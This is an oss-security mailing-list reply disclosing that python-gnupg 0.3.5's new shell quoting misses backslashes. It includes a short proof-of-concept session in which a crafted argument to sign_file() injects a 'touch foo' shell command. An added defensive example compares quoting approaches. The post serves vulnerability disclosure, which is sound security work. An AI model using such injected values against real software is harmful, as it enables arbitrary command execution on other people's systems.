Message-ID: <CAD3CancDiRhPs9zeqg8SK19A3JbAb_eCx+x0e3STFMLPneTrXw@mail.gmail.com>
Date: Tue, 4 Feb 2014 23:27:34 +1300
From: Matthew Daley <mattd@...fuzz.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE request: python-gnupg before 0.3.5 shell injection

On Tue, Feb 4, 2014 at 11:04 PM, Henri Salo <henri@...v.fi> wrote:
> On Tue, Feb 04, 2014 at 10:35:46AM +0100, Hanno Böck wrote:
>> python-gnupg 0.3.5 lists in the changelog:
>> "Added improved shell quoting to guard against shell injection."
>>
>> Sounds like a severe security issue, but further info is lacking.
>
> Diff attached. New function shell_quote() seems to represent major changes to
> shell input quoting against unsafe input.
> [...]

This appears to (at least) miss escaping of backslashes:

$ ls foo
ls: cannot access foo: No such file or directory
$ python
Python 2.7.6 (default, Jan 11 2014, 14:34:26)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import gnupg
>>> gnupg.GPG().sign_file(open("/dev/null"), "'\\\"; touch foo #'")
<gnupg.Sign object at 0x7fb3dbfad7d0>
>>>
$ ls foo
foo

- Matthew
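
The following is an added example, not part of the original message and not python-gnupg's code. It contrasts a hypothetical double-quote quoter that leaves backslashes unescaped (`naive_quote`, an assumed stand-in for the behaviour reported above) with `shlex.quote` and with passing the value as an argument-list element, so no shell is involved. All helper names are assumptions; `shlex` is used only to parse strings, and nothing is run through a shell.

```python
import shlex
import subprocess
import sys

# The second argument passed to sign_file() in the message above.
PAYLOAD = "'\\\"; touch foo #'"

safe_quote = shlex.quote  # standard-library quoter (Python 3.3+)

def naive_quote(value):
    """Hypothetical quoter (assumption, not python-gnupg's code): wraps the
    value in double quotes and escapes only '"', leaving backslashes alone."""
    return '"' + value.replace('"', '\\"') + '"'

def stays_one_word(quoter, value):
    """True if a POSIX-style parser reads quoter(value) back as exactly one
    argument equal to value. The command line is parsed, never executed."""
    try:
        words = shlex.split("gpg --default-key " + quoter(value))
    except ValueError:  # unbalanced quotes: the value broke out of its quoting
        return False
    return words == ["gpg", "--default-key", value]

def argv_roundtrip(value):
    """Pass value as a list element with no shell in between and return
    what the child process received as its first argument."""
    child = "import sys; sys.stdout.write(sys.argv[1])"
    return subprocess.check_output(
        [sys.executable, "-c", child, value], universal_newlines=True)

if __name__ == "__main__":
    for name, quoter in (("naive_quote", naive_quote), ("shlex.quote", safe_quote)):
        print(name,
              "| plain value intact:", stays_one_word(quoter, "Alice Example"),
              "| payload intact:", stays_one_word(quoter, PAYLOAD))
    print("argv list intact:", argv_roundtrip(PAYLOAD) == PAYLOAD)
```

The backslash in the input consumes the escape that `naive_quote` adds before the `"`, so the double-quoted string ends early and the rest of the value is parsed as separate shell syntax.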